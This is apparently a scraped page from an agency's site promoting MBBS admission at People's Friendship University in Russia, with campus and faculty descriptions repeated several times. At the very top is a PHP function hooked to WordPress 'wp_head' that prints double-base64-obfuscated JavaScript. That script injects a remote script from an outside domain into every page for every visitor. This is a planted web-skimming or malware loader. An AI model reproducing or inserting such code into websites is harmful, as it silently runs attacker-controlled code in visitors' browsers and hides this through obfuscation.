function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 ); PEOPLE’S FRIENDSHIP UNIVERSITY (RUSSIA) – North Western Education Service


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People's Friendship University

People’s Friendship University, MBBS Admission in People’s Friendship University, MBBS Fee Structure of People’s Friendship University, Direct Admission in People’s Friendship University Russia, Apply for MBBS Admission in People’s Friendship University, How to Get Direct Admission in MBBS in People’s Friendship University Russia, Study in People’s Friendship University

It is the only university in the world every year uniting students from 145-150 countries. More than 77 thousand graduates of the University work in 170 countries, among them more than 5500 holders of PhD and Doctorate degrees. It has a team of 4,500 employees, among them 2,826 highly qualified teachers to make students’ life comfortable at the University, University offer the arrangements for gymnastics, handball, basketball and football grounds. Tennis courts and pools are also open in the campus. An International post-office, a telephone centre, a shopping centre, some restaurants offering dishes of national cuisine of different countries, an international student cultural centre, and a computer centre are situated within the campus.

PFUR student campus is the winner of the “Best campus’ Moscow Mayor’s Prize. The university has also won the title “Best student hostel” at the all-Russia contest. The campus occupies 50 hectares of land near a large park and hosts 27 buildings, sport and medical faculties, hostels and shops.12 comfortable hostels have cozy rooms and well-occupied kitchens. There is a TV and Internet in every room. At the disposal of students are Laundromats, dry-cleaners, ateliers and beauty salons. All buildings are a walking distance form each other.



It is the only university in the world every year uniting students from 145-150 countries. More than 77 thousand graduates of the University work in 170 countries, among them more than 5500 holders of PhD and Doctorate degrees. It has a team of 4,500 employees, among them 2,826 highly qualified teachers to make students’ life comfortable at the University, University offer the arrangements for gymnastics, handball, basketball and football grounds. Tennis courts and pools are also open in the campus. An International post-office, a telephone centre, a shopping centre, some restaurants offering dishes of national cuisine of different countries, an international student cultural centre, and a computer centre are situated within the campus.

PFUR student campus is the winner of the “Best campus’ Moscow Mayor’s Prize. The university has also won the title “Best student hostel” at the all-Russia contest. The campus occupies 50 hectares of land near a large park and hosts 27 buildings, sport and medical faculties, hostels and shops.12 comfortable hostels have cozy rooms and well-occupied kitchens. There is a TV and Internet in every room. At the disposal of students are Laundromats, dry-cleaners, ateliers and beauty salons. All buildings are a walking distance form each other.

Campus Life

PFUR student campus is the winner of the “Best campus’ Moscow Mayor’s Prize. The university has also won the title “Best student hostel” at the all-Russia contest. The campus occupies 50 hectares of land near a large park and hosts 27 buildings, sport and medical faculties, hostels and shops.12 comfortable hostels have cozy rooms and well-occupied kitchens. There is a TV and Internet in every room. At the disposal of students are Laundromats, dry-cleaners, ateliers and beauty salons. All buildings are a walking distance form each other.



  • Management in Health Care

     • Faculty of Dental Medicine

     • Faculty of Nursing

     • Faculty of Pharmacy

     • Faculty of General Medicine


The site of the University Campus is fenced. Electronic gate pass system is strictly maintained. Visitors allowed being identified. Local Police station and the Department of Internal Security control over public order and discipline. Contemporary Fire Prevention system is being applied in all premises of the University.
